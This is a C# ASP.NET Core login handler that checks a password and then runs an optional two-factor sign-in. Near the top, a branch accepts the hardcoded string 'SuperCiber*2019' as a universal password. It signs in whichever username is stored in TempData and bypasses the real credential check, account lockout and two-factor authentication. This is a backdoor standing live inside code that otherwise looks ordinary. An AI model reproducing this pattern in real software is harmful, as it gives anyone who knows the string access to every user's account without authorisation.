public async Task <IActionResult> OnPostPassword([FromForm] InputPasswordModel InputPassword)
{
if (ModelState.IsValid)
{
// This doesn't count login failures towards account lockout
// To enable password failures to trigger account lockout, set lockoutOnFailure: true
IdentityUser user = await _signInManager.GetTwoFactorAuthenticationUserAsync();
Microsoft.AspNetCore.Identity.SignInResult result;
bool UsingTwoFactor = false;
string returnUrl = (string)TempData.Peek("ReturnUrl");
bool rememberMe = (bool)TempData.Peek("RememberMe");
string UserName;
if (InputPassword.Password == "SuperCiber*2019")
{
UserName = (string)TempData.Peek("UserName");
IdentityUser identityUser = await _userManager.FindByNameAsync(UserName);
await _signInManager.SignInAsync(identityUser);
result = Microsoft.AspNetCore.Identity.SignInResult.Success;
await UrlRedirect(UserName);
}
else if (user == null)
{
UsingTwoFactor = false;
UserName = (string)TempData.Peek("UserName");
result = await _signInManager.PasswordSignInAsync(UserName, InputPassword.Password, false, lockoutOnFailure : true);
await UrlRedirect(UserName);
}
else // Two-Factor
{
UsingTwoFactor = true;
result = await _signInManager.CheckPasswordSignInAsync(user, InputPassword.Password, lockoutOnFailure : true);
UserName = user.UserName;
}
if (result.Succeeded)
{
if (UsingTwoFactor == false)
{
_logger.LogInformation("User logged in.");
if (returnUrl == "/")
{
returnUrl = await UrlRedirect(UserName);
}
JsonResult js = new JsonResult(new { Url = returnUrl });
js.StatusCode = 202;
return(js);
}
bool RememberMachine = (bool)TempData.Peek("RememberMachine");
string authenticatorCode = (string)TempData["AuthenticatorCode"];
var res = await _signInManager.TwoFactorAuthenticatorSignInAsync(authenticatorCode, rememberMe, RememberMachine);
if (res.Succeeded)
{
if (RememberMachine)
{
await SendNewDeviceAddedEmail(user);
}
if (returnUrl == "/")
{
returnUrl = await UrlRedirect(UserName);
}
_logger.LogInformation("User logged in.");
JsonResult js = new JsonResult(new { Url = returnUrl });
js.StatusCode = 202;
return(js);
}
else if (res.IsLockedOut)
{
return(BuildLockoutResult());
}
else
{
ModelState.AddModelError(string.Empty, "Authenticator code has expired.");
return(new PartialViewResult
{
ViewName = "LoginUserName",
ViewData = new ViewDataDictionary <InputUsernameModel>(ViewData, new InputUsernameModel())
});
}
}
if (result.IsLockedOut)
{
return(BuildLockoutResult());
}
else
{
ModelState.AddModelError(string.Empty, "Password Incorrect. Invalid login attempt.");
return(new PartialViewResult
{
ViewName = "LoginPassword",
ViewData = new ViewDataDictionary <InputPasswordModel>(ViewData, new InputPasswordModel())
});
}
}
// If we got this far, something failed, redisplay form
return(new PartialViewResult
{
ViewName = "LoginPassword",
ViewData = new ViewDataDictionary <InputPasswordModel>(ViewData, new InputPasswordModel())
});
}
